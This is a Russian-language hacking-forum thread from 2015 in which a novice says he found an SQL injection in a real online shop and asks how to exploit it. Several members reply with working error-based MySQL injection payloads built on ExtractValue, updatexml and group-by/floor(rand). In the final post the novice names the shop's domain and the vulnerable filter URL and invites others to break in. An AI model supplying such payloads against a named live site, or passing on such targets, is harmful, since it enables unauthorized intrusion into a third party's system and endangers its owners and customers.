HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.08.2015, 05:07
joomla
Новичок
Регистрация: 20.08.2011
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Здравствуйте, коллеги Вообщем недавно решил помимо разработки сайтов научиться взламывать сайты. Нарыл один интересный интернет-магазин, и сразу же нашел SQL инъекцию.



Вообщем что только не придумывал, и union прописывал и т.д.

Вылетает одна и та же хрень, ошибка синтаксиса. Инъекция работает если ставить " кавычку.



Какие еще могут быть варианты для взлома?
 
Ответить с цитированием

  #2  
Старый 26.08.2015, 06:37
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
Провел на форуме:
179197

Репутация: 25


По умолчанию

Пробуйте error based вектор. например:

'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1

или

'-updatexml(0,repeat(version(),2),2)#
 
Ответить с цитированием

  #3  
Старый 26.08.2015, 11:13
sander
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме:
2065

Репутация: 0
По умолчанию

Чувак я советую полностью тебе ссылку закрывать,я её через inurl нашёл .
 
Ответить с цитированием

  #4  
Старый 27.08.2015, 02:17
joomla
Новичок
Регистрация: 20.08.2011
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от SaNDER  

Чувак я советую полностью тебе ссылку закрывать,я её через inurl нашёл .
да все равно, кто нашел, тот молодец. Сайт я взломать пытаюсь не для корыстной цели, а для практики.

----------------------------------
 
Ответить с цитированием

  #5  
Старый 27.08.2015, 02:18
joomla
Новичок
Регистрация: 20.08.2011
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Br@!ns  

Пробуйте error based вектор. например:
'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1
или
'-updatexml(0,repeat(version(),2),2)#
Не помогло....
 
Ответить с цитированием

  #6  
Старый 27.08.2015, 16:37
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

"))))||1+group+by+concat(version(),floor(rand(0)*2 ))having+min(0)%23

в ошибке увидите версию
 
Ответить с цитированием

  #7  
Старый 27.08.2015, 17:43
sander
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме:
2065

Репутация: 0
По умолчанию

Цитата:
Сообщение от yarbabin  

"))))||1+group+by+concat(version(),floor(rand(0)*2 ))having+min(0)%23
в ошибке увидите версию
Тоже не пашет .
 
Ответить с цитированием

  #8  
Старый 27.08.2015, 17:45
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Цитата:
Сообщение от yarbabin  

"))))||1+group+by+concat(version(),floor(rand(0)*2 ))having+min(0)%23
в ошибке увидите версию
а какого типа эта инъекция, если можно манукльчик ))
 
Ответить с цитированием

  #9  
Старый 27.08.2015, 17:45
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
Провел на форуме:
290351

Репутация: 173


По умолчанию

Цитата:
Сообщение от BabaDook  

а какого типа эта инъекция, если можно манукльчик ))
error based
 
Ответить с цитированием

  #10  
Старый 28.08.2015, 02:22
joomla
Новичок
Регистрация: 20.08.2011
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Вообщем кому интересно ломануть сайтик, а потом рассказать (поделиться опытом), как это сделал, вот ссыль - http://xn--80abd6ar5a2c.xn--p1ai/

Инъекция - http://xn--80abd6ar5a2c.xn--p1ai/shop/product/filter?productFilter[_ef][gender][]=Мужская"
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.